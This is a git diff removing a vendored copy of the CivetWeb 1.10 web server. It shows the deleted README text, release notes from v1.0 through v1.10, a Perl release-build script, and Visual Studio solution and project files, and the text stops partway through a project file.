-This project is very easy to install and use. 
-Please read the [documentation](https://github.com/civetweb/civetweb/blob/master/docs/)
-and have a look at the [examples](https://github.com/civetweb/civetweb/blob/master/examples/).
-More information may be found on the [mailing list](https://groups.google.com/d/forum/civetweb).
-
-Note: I do not take any liability or warranty for any linked contents.  Visit these pages and try the community support suggestions at your own risk.
-
-
-Contributions
----------------
-
-Contributions are welcome provided all contributions carry the MIT license.
-
-DO NOT APPLY fixes copied from Mongoose to this project to prevent GPL tainting.
-Since 2013, CivetWeb and Mongoose are developed independently.
-By now the code base differs, so patches cannot be safely transfered in either direction.
-
-Some guidelines can be found in [docs/Contribution.md](https://github.com/civetweb/civetweb/blob/master/docs/Contribution.md).
-
-
-### Authors
-
-CivetWeb is based on the Mongoose project.  The original author of Mongoose was
-Sergey Lyubka (Copyright (c) 2004-2013 Sergey Lyubka, MIT license).
-
-However, in August 16, 2013, the [license of Mongoose has been changed](https://groups.google.com/forum/#!topic/mongoose-users/aafbOnHonkI)
-after writing and distributing the original code this project is based on.
-The license change and CivetWeb used to be mentioned on the Mongoose
-[Wikipedia](https://en.wikipedia.org/wiki/Mongoose_(web_server))
-page as well, but it's getting deleted (and added again) there every
-now and then.
-
-CivetWeb has been forked from the last MIT version of Mongoose.
-Since 2013, CivetWeb has seen many improvements from various authors
-(Copyright (c) 2013-2017 the CivetWeb developers, MIT license).
-A list of authors can be found in [CREDITS.md](https://github.com/civetweb/civetweb/blob/master/CREDITS.md).
-
-Using the CivetWeb project ensures the MIT licenses terms are applied and
-GPL cannot be imposed on any of this code, as long as it is sourced from
-here. This code will remain free with the MIT license protection.
-
diff --git a/thirdparty/civetweb-1.10/RELEASE_NOTES.md b/thirdparty/civetweb-1.10/RELEASE_NOTES.md
deleted file mode 100644
index dfae89f..0000000
--- a/thirdparty/civetweb-1.10/RELEASE_NOTES.md
+++ /dev/null
@@ -1,395 +0,0 @@
-Release Notes v1.10
-===
-### Objectives: *OpenSSL 1.1 support, add server statistics and diagnostic data*
-
-Changes
--------
-
-- Add missing `mg_` or `MG_` to symbols in civetweb.h. Symbols without will be removed a future version.
-- Add HTTPS server configuration example
-- Lua Pages: mg.include should support absolute, relative and virtual path types
-- Add API function for HTTP digest authentication
-- Improved interface documentation
-- Support parameters for Lua background scripts
-- Use new connection queue implementation (previously ALTERNATIVE\_QUEUE) as default
-- Add USE\_SERVER\_STATS define, so the server collects statistics data
-- Convert system\_info text output and all other diagnostic strings to JSON format
-- Add experimental function to query the connection status (may be dropped again)
-- Add document on proposed future interface changes (for comments)
-- Officially drop Symbian support
-- Ignore leading blank lines in multipart messages (for Android upload service)
-- Rewrite some functions, in particular request parsing
-- CORS preflight directly in the server, with additional config options
-- Solve some warnings from different static source code analysis tools
-- Collect server status data
-- Allow hostname in listening\_ports
-- Make maximum request size configurable
-- Allow multiple Sec-Websocket-Protocol
-- Add configuration option to send additional headers
-- Add configuration option for Strict-Transport-Security
-- Mark "file in memory" feature is a candidate for deletion
-- Improve examples
-- Fix timeout error when sending larger files
-- Add mg\_send\_chunk interface function
-- Allow to separate server private key and certificate chain in two different files
-- Support for multipart requests without quotes (for some C# clients)
-- Initialize SSL in mg\_init\_library, so https client functions can be used when no server is running
-- Allow "REPORT" HTTP method for REST calls to scripts
-- Allow to compile civetweb.c wih a C++ compiler
-- Lua: Remove internal length limits of encode/decode functions
-- Allow sub-resources of index script files
-- Add config parameter allow\_index\_script\_resource the aforementioned feature
-- Remove deprecated "uri" member of the request from the interface
-- Improve documentation
-- Make auth domain check optional (configuration)
-- Update unit test framework to check 0.11.0 (C89/C90 compilers still need a patched version)
-- Limit depth of mg.include for Lua server pages
-- Additional unit tests
-- OpenSSL 1.1 support
-- Update version number
-
-
-Release Notes v1.9.1
-===
-### Objectives: *Bug fix*
-
-Changes
--------
-
-- Add "open website" button for pre-built Windows binaries
-- Fix for connections closed prematurely
-- Update to a new check unit test framework and remove patches required for previous version
-- Update version number
-
-
-Release Notes v1.9
-===
-### Objectives: *Read SSI client certificate information, improve windows usability, use non-blocking sockets, bug fixes*
-
-Changes
--------
-
-- Add library init/exit functions (call is now optional, but will be required in V1.10)
-- Windows: Show system information from the tray icon
-- Windows: Bring overlaid windows to top from the tray icon
-- Add Lua background script, running independent from server state
-- Move obsolete examples into separated directory
-- Change name of CMake generated C++ library to civetweb-cpp
-- Add option to set linger timeout
-- Update Duktape and Lua (third-party code)
-- Add continuous integration tests
-- Add API documentation
-- Limit recursions in .htpasswd files
-- Fix SCRIPT_NAME for CGI directory index files (index.php)
-- Use non-blocking sockets
-- stdint.h is now required and no longer optional
-- Rewrite connection close handling
-- Rewrite mg_fopen/mg_stat
-- Enhanced tray icon menu for Windows
-- Add subprotocol management for websocket connections
-- Partially rewrite timeout handling
-- Add option keep_alive_timeout_ms
-- Improve support for absolute URIs
-- Allow some additional compiler checks (higher warning level)
-- Add option for case sensitive file names for Windows
-- Short notation for listening_ports option when using IPv4 and IPv6 ports
-- Make usage of Linux sendfile configurable
-- Optimize build matrix for Travis CI
-- Retry failing TLS/HTTPS read/write operations
-- Read client certificate information
-- Do not tolerate URIs with invalid characters
-- Fix mg_get_cookie to ignore substrings
-- Fix memory leak in form handling
-- Fix bug in timer logic (for Lua Websockets)
-- Updated version number
-
-Release Notes v1.8
-===
-### Objectives: *CMake integration and continuous integration tests, Support client certificates, bug fixes*
-
-Changes
--------
-
-- Replace mg_upload by mg_handle_form_request
-- CGI-scripts must receive EOF if all POST data is read
-- Add API function to handle all kinds of HTML form data
-- Do not allow short file names in Windows
-- Callback when a new thread is initialized
-- Support for short lived certificates
-- Add NO_CACHING compile option
-- Update Visual Studio project files to VS2015; rename directory VS2012 to VS
-- Sec-Wesocket-Protocol must only return one protocol
-- Mark some examples and tests as obsolete
-- Remove no longer maintained test utils
-- Add some default MIME types and the mg_send_mime_file API function.
-- Client API using SSL certificates
-- Send "Cache-Control" headers
-- Add alternative to mg_upload
-- Additional configuration options
-- Fix memory leaks
-- Add API function to check available features
-- Add new interface to get listening ports
-- Add websocket client interface and encode websocket data with a simple random number
-- Support SSL client certificates
-- Add configuration options for SSL client certificates
-- Stand-alone server: Add command line option -I to display information about the system
-- Redirect stderr of CGI process to error log
-- Support absolute URI; split uri in mg_request_info to request_uri and local_uri
-- Some source code refactoring, to improve maintainability
-- Use recursive mutex for Linux
-- Allow CGI environment to grow dynamically
-- Support build for Lua 5.1 (including LuaJIT), Lua 5.2 and Lua 5.3
-- Improve examples and documentation
-- Build option CIVETWEB_SERVE_NO_FILES to disable serving static files
-- Add Server side JavaScript support (Duktape library)
-- Created a "civetweb" organization at GitHub.
-- Repository moved from https://github.com/bel2125/civetweb to https://github.com/civetweb/civetweb
-- Improved continuous integration
-- CMake support, continuous integration with Travis CI and Appveyor
-- Adapt/port unit tests to CMake/Travis/Appveyor
-- Bug fixes, including issues from static code analysis
-- Add status badges to the GitHub project main page
-- Updated version number
-
-Release Notes v1.7
-===
-### Objectives: *Examples, documentation, additional API functions, some functions rewritten, bug fixes and updates*
-
-Changes
--------
-
-- Format source with clang_format
-- Use function 'sendfile' for Linux
-- Fix for CRAMFS in Linux
-- Fix for file modification times in Windows
-- Use SO_EXCLUSIVEADDRUSE instead of SO_REUSEADDR for Windows
-- Rewrite push/pull functions
-- Allow to use Lua as shared objects (WITH_LUA_SHARED)
-- Fixes for many warnings
-- URI specific callbacks and different timeouts for websockets
-- Add chunked transfer support
-- Update LuaFileSystem
-- Update Lua to 5.2.4
-- Fix build for MinGW-x64, TDM-GCC and clang
-- Update SQLite to 3.8.10.2
-- Fix CGI variables SCRIPT_NAME and PATH_TRANSLATED
-- Set TCP_USER_TIMEOUT to deal faster with broken connections
-- Add a Lua form handling example
-- Return more differentiated HTTP error codes
-- Add log_access callback
-- Rewrite and comment request handling function
-- Specify in detail and document return values of callback functions
-- Set names for all threads (unless NO_THREAD_NAME is defined)
-- New API functions for TCP/HTTP clients
-- Fix upload of huge files
-- Allow multiple SSL instances within one application
-- Improve API and user documentation
-- Allow to choose between static and dynamic Lua library
-- Improve unit test
-- Use temporary file name for partially uploaded files
-- Additional API functions exported to C++
-- Add a websocket client example
-- Add a websocket client API
-- Update websocket example
-- Make content length available in request_info
-- New API functions: access context, callback for create/delete, access user data
-- Upgraded Lua from 5.2.2 to 5.2.3 and finally 5.2.4
-- Integrate LuaXML (for testing purposes)
-- Fix compiler warnings
-- Updated version number
-
-Release Notes v1.6
-===
-### Objectives: *Enhance Lua support, configuration dialog for windows, new examples, bug fixes and updates*
-
-Changes
--------
-
-- Add examples of Lua pages, scripts and websockets to the test directory (bel)
-- Add dialog to change htpasswd files for the Windows standalone server (bel)
-- Fix compiler warnings and warnings from static code analysis (Danny Al-Gaaf, jmc-, Thomas, bel, ...)
-- Add new unit tests (bel)
-- Support includes in htpasswd files (bel)
-- Add a basic option check for the standalone executable (bel)
-- Support user defined error pages (bel)
-- Method to get POST request parameters via C++ interface (bel)
-- Re-Add unit tests for Linux and Windows (jmc-, bel)
-- Allow to specify title and tray icon for the Windows standalone server (bel)
-- Fix minor memory leaks (bel)
-- Redirect all memory allocation/deallocation through mg functions which may be overwritten (bel)
-- Support Cross-Origin Resource Sharing (CORS) for static files and scripts (bel)
-- Win32: Replace dll.def file by export macros in civetweb.h (CSTAJ)
-- Base64 encode and decode functions for Lua (bel)
-- Support pre-loaded files for the Lua environment (bel)
-- Server should check the nonce for http digest access authentication (bel)
-- Hide read-only flag in file dialogs opened by the Edit Settings dialog for the Windows executable (bel)
-- Add all functions to dll.def, that are in the header (bel)
-- Added Lua extensions: send_file, get_var, get_mime_type, get_cookie, url_decode, url_encode (bel)
-- mg_set_request_handler() mod to use pattern (bel, Patch from Toni Wilk)
-- Solved, tested and documented SSL support for Windows (bel)
-- Fixed: select for Linux needs the nfds parameter set correctly (bel)
-- Add methods for returning the ports civetweb is listening on (keithel)
-- Fixes for Lua Server Pages, as described within the google groups thread. (bel)
-- Added support for plain Lua Scripts, and an example script. (bel)
-- A completely new, and more illustrative websocket example for C. (bel)
-- Websocket for Lua (bel)
-- An optional websocket_root directory, including URL rewriting (bel)
-- Update of SQLite3 to 3.8.1. (bel)
-- Add "date" header field to replies, according to the requirements of RFC 2616 (the HTTP standard), Section 14.18 (bel)
-- Fix websocket long pull (celeron55)
-- Updated API documentation (Alex Kozlov)
-- Fixed Posix locking functions for Windows (bel2125)
-- Updated version number
-
-Release Notes v1.5
-===
-### Objectives: *Bug fixes and updates, repository restoration*
-
-Changes
--------
-
-- Corrected bad mask flag/opcode passing to websocket callback (William Greathouse)
-- Moved CEVITWEB_VERSION define into civetweb.h
-- Added new simple zip deployment build for Windows.
-- Removed windows install package build.
-- Fixes page violation in mod_lua.inl (apkbox)
-- Use C style comments to enable compiling most of civetweb with -ansi. (F-Secure Corporation)
-- Allow directories with non ASCII characters in Windows in UTF-8 encoded (bel2125)
-- Added Lua File System support (bel2125)
-- Added mongoose history back in repository thanks to (Paul Sokolovsky)
-- Fixed keep alive (bel2125)
-- Updated of MIME types (bel2125)
-- Updated lsqlite (bel2125)
-- Fixed master thread priority (bel2125)
-- Fixed IPV6 defines under Windowe (grenclave)
-- Fixed potential dead lock in connection_close() (Morgan McGuire)
-- Added WebSocket example using asynchronous server messages (William Greathouse)
-- Fixed the getcwd() warning (William Greathouse)
-- Implemented the connection_close() callback (William Greathouse)
-- Fixed support URL's in civetweb.c (Daniel Oaks)
-- Allow port number to be zero to use a random free port (F-Secure Corporation)
-- Wait for threads to finish when stopping for a clean shutdown (F-Secure Corporation)
-- More static analysis fixes against Coverity tool (F-Secure Corporation)
-- Travis automated build testing support added (Daniel Oaks)
-- Updated version numbers.
-- Added contributor credits file.
-
-Release Notes v1.4
-===
-### Objectives: *New URI handler interface, feature enhancements, C++ extensions*
-The main idea behind this release is to bring about API consistency. All changes
-are backward compatible and have been kept to a minimum.
-
-Changes
--------
-
-- Added mg_set_request_handler() which provides a URI mapping for callbacks.
-   This is a new alternative to overriding callbacks.begin_request.
-- Externalized mg_url_encode()
-- Externalized mg_strncasecmp() for utiliy
-- Added CivetServer::getParam methods
-- Added CivetServer::urlDecode methods
-- Added CivetServer::urlEncode methods
-- Dealt with compiler warnings and some static analysis hits.
-- Added mg_get_var2() to parse repeated query variables
-- Externalized logging function cry() as mg_cry()
-- Added CivetServer::getCookie method (Hariprasad Kamath)
-- Added CivetServer::getHeader method (Hariprasad Kamath)
-- Added new basic C embedding example
-- Conformed source files to UNIX line endings for consistency.
-- Unified the coding style to improve reability.
-
-Release Notes v1.3
-===
-### Objectives: *Buildroot Integration*
-
-Changes
--------
-
-- Made option to put initial HTMLDIR in a different place
-- Validated build without SQLITE3 large file support
-- Updated documentation
-- Updated Buildroot config example
-
-Release Notes v1.2
-===
-### Objectives: *Installation Improvements, buildroot, cross compile support*
-The objective of this release is to make installation seamless.
-
-Changes
--------
-
-- Create an installation guide
-- Created both 32 and 64 bit windows installations
-- Added install for windows distribution
-- Added 64 bit build profiles for VS 2012.
-- Created a buildroot patch
-- Updated makefile to better support buildroot
-- Made doc root and ports configurable during the make install.
-- Updated Linux Install
-- Updated OS X Package
-- Improved install scheme with welcome web page
-
-Known Issues
------
-
-- The prebuilt Window's version requires [Visual C++ Redistributable for Visual Studio 2012](http://www.microsoft.com/en-us/download/details.aspx?id=30679)
-
-Release Notes v1.1
-===
-### Objectives: *Build, Documentation, License Improvements*
-The objective of this release is to establish a maintable code base, ensure MIT license rights and improve usability and documentation.
-
-Changes
--------
-
-- Reorangized build directories to make them more intuitive
-- Added new build rules for lib and slib with option to include C++ class
-- Upgraded Lua from 5.2.1 to 5.2.2
-- Added fallback configuration file path for Linux systems.
-    + Good for having a system wide default configuration /usr/local/etc/civetweb.conf
-- Added new C++ abstraction class CivetServer
-- Added thread safety for and fixed websocket defects (Morgan McGuire)
-- Created PKGBUILD to use Arch distribution (Daniel Oaks)
-- Created new documentation on Embeddeding, Building and yaSSL (see docs/).
-- Updated License file to include all licenses.
-- Replaced MD5 implementation due to questionable license.
-     + This requires new source file md5.inl
-- Changed UNIX/OSX build to conform to common practices.
-     + Supports build, install and clean rules.
-     + Supports cross compiling
-     + Features can be chosen in make options
-- Moved Cocoa/OSX build and packaging to a separate file.
-     + This actually a second build variant for OSX.
-     + Removed yaSSL from the OSX build, not needed.
-- Added new Visual Studio projects for Windows builds.
-     + Removed Windows support from Makefiles
-     + Provided additional, examples with Lua, and another with yaSSL.
-- Changed Zombie Reaping policy to not ignore SIGCHLD.
-     + The previous method caused trouble in applciations that spawn children.
-
-Known Issues
------
-
-- Build support for VS6 and some other has been deprecated.
-    + This does not impact embedded programs, just the stand-alone build.
-    + The old Makefile was renamed to Makefile.deprecated.
-    + This is partcially do to lack fo testing.
-    + Need to find out what is actually in demand.
-- Build changes may impact current users.
-    + As with any change of this type, changes may impact some users.
-
-Release Notes v1.0
-===
-
-### Objectives: *MIT License Preservation, Rebranding*
-The objective of this release is to establish a version of the Mongoose software distribution that still retains the MIT license.
-
-Changes
--------
-
-- Renamed Mongoose to Civetweb in the code and documentation.
-- Replaced copyrighted images with new images
-- Created a new code respository at https://github.com/civetweb/civetweb
-- Created a distribution site at https://sourceforge.net/projects/civetweb/
-- Basic build testing
diff --git a/thirdparty/civetweb-1.10/VisualStudio/buildRelease.pl b/thirdparty/civetweb-1.10/VisualStudio/buildRelease.pl
deleted file mode 100644
index df8db09..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/buildRelease.pl
+++ /dev/null
@@ -1,71 +0,0 @@
-#!/usr/bin/perl
-# 
-# Copyright (c) 2013 No Face Press, LLC
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-# This script builds and packages a Windows release.
-# It requires ActiveState Perl to use and is intended
-# to be run from the its directory under the 
-# VS Developer Command Prompt.
-
-# Create a Zip file
-use Archive::Zip qw( :ERROR_CODES :CONSTANTS );
-my $zip = Archive::Zip->new();
-
-my $src = "..";
-
-sub getCivetwebVersion {
-    print "Fetching CivetWeb version...\n";
-    open HEADER, "${src}/include/civetweb.h";
-    while (<HEADER>) {
-        if (m/define\s+CIVETWEB_VERSION\s+"(.+)"/) {
-            close HEADER;
-            return $1;
-        }
-    }
-    close HEADER;
-    return "UNKNOWN_VERSION";
-}
-
-my $CIVETWEB_VERSION = getCivetwebVersion();
-my $basename         = "civetweb-$CIVETWEB_VERSION";
-my $dir              = "${basename}";
-
-sub build32() {
-    print "\nBuilding Win32 Release version...\n";
-    system("msbuild /p:Configuration=Release /p:Platform=Win32 civetweb.sln");
-}
-
-sub build64() {
-    print "\nBuilding x64 Release version...\n";
-    system("msbuild /p:Configuration=Release /p:Platform=x64 civetweb.sln");
-}
-
-sub writeArchive() {
-    my $archive = "${basename}-win.zip";
-    print "Creating archive $archive ...\n";
-
-    $zip->addDirectory("${dir}/");
-
-    $zip->addFile( "${src}/LICENSE.md",            "${dir}/LICENSE.md" );
-    $zip->addFile( "${src}/README.md",             "${dir}/README.md" );
-    $zip->addFile( "${src}/resources/systray.ico", "${dir}/systray.ico" );
-    $zip->addFile( "${src}/resources/civetweb_64x64.png",
-        "${dir}/civetweb_64x64.png" );
-    $zip->addFile( "${src}/resources/itworks.html", "${dir}/index.html" );
-    $zip->addFile( "${src}/VS2012/Release/Win32/civetweb_lua.exe",
-        "${dir}/civetweb32.exe" );
-    $zip->addFile( "${src}/VS2012/Release/x64/civetweb_lua.exe",
-        "${dir}/civetweb64.exe" );
-
-    unless ( $zip->writeToFileNamed($archive) == AZ_OK ) {
-        die 'write error';
-    }
-
-}
-
-build32();
-build64();
-writeArchive();
-exit 0;
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb.sln b/thirdparty/civetweb-1.10/VisualStudio/civetweb.sln
deleted file mode 100644
index 0e8672b..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb.sln
+++ /dev/null
@@ -1,75 +0,0 @@
-

-Microsoft Visual Studio Solution File, Format Version 12.00

-# Visual Studio 14

-VisualStudioVersion = 14.0.25420.1

-MinimumVisualStudioVersion = 10.0.40219.1

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "civetweb_lua", "civetweb_lua\civetweb_lua.vcxproj", "{9BE9C008-E851-42B1-A034-BD4630AE4CD6}"

-	ProjectSection(ProjectDependencies) = postProject

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD} = {0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}

-	EndProjectSection

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lua_lib", "lua_lib\lua_lib.vcxproj", "{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}"

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ex_embedded_c", "ex_embedded_c\ex_embedded_c.vcxproj", "{882EC43C-2EEE-434B-A711-C844108D29C6}"

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "unit_test", "unit_test\unit_test.vcxproj", "{1AC4A7A6-0100-4287-97F4-B95807BE5607}"

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "duktape_lib", "duktape_lib\duktape_lib.vcxproj", "{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}"

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ex_embed_cpp", "ex_embed_cpp\ex_embed_cpp.vcxproj", "{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}"

-EndProject

-Global

-	GlobalSection(SolutionConfigurationPlatforms) = preSolution

-		Debug|Win32 = Debug|Win32

-		Debug|x64 = Debug|x64

-		Release|Win32 = Release|Win32

-		Release|x64 = Release|x64

-	EndGlobalSection

-	GlobalSection(ProjectConfigurationPlatforms) = postSolution

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Debug|Win32.ActiveCfg = Debug|Win32

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Debug|Win32.Build.0 = Debug|Win32

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Debug|x64.ActiveCfg = Debug|x64

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Debug|x64.Build.0 = Debug|x64

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Release|Win32.ActiveCfg = Release|Win32

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Release|Win32.Build.0 = Release|Win32

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Release|x64.ActiveCfg = Release|x64

-		{9BE9C008-E851-42B1-A034-BD4630AE4CD6}.Release|x64.Build.0 = Release|x64

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Debug|Win32.ActiveCfg = Debug|Win32

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Debug|Win32.Build.0 = Debug|Win32

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Debug|x64.ActiveCfg = Debug|x64

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Debug|x64.Build.0 = Debug|x64

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Release|Win32.ActiveCfg = Release|Win32

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Release|Win32.Build.0 = Release|Win32

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Release|x64.ActiveCfg = Release|x64

-		{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}.Release|x64.Build.0 = Release|x64

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Debug|Win32.ActiveCfg = Debug|Win32

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Debug|Win32.Build.0 = Debug|Win32

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Debug|x64.ActiveCfg = Debug|x64

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Release|Win32.ActiveCfg = Release|Win32

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Release|Win32.Build.0 = Release|Win32

-		{882EC43C-2EEE-434B-A711-C844108D29C6}.Release|x64.ActiveCfg = Release|x64

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Debug|Win32.ActiveCfg = Debug|Win32

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Debug|Win32.Build.0 = Debug|Win32

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Debug|x64.ActiveCfg = Debug|Win32

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Release|Win32.ActiveCfg = Release|Win32

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Release|Win32.Build.0 = Release|Win32

-		{1AC4A7A6-0100-4287-97F4-B95807BE5607}.Release|x64.ActiveCfg = Release|Win32

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Debug|Win32.ActiveCfg = Debug|Win32

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Debug|Win32.Build.0 = Debug|Win32

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Debug|x64.ActiveCfg = Debug|x64

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Debug|x64.Build.0 = Debug|x64

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Release|Win32.ActiveCfg = Release|Win32

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Release|Win32.Build.0 = Release|Win32

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Release|x64.ActiveCfg = Release|x64

-		{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}.Release|x64.Build.0 = Release|x64

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Debug|Win32.ActiveCfg = Debug|Win32

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Debug|Win32.Build.0 = Debug|Win32

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Debug|x64.ActiveCfg = Debug|x64

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Release|Win32.ActiveCfg = Release|Win32

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Release|Win32.Build.0 = Release|Win32

-		{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}.Release|x64.ActiveCfg = Release|x64

-	EndGlobalSection

-	GlobalSection(SolutionProperties) = preSolution

-		HideSolutionNode = FALSE

-	EndGlobalSection

-EndGlobal

diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj
deleted file mode 100644
index 45f8bbe..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj
+++ /dev/null
@@ -1,216 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{9BE9C008-E851-42B1-A034-BD4630AE4CD6}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>civetweb_lua</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug CONSOLE|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug CONSOLE|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

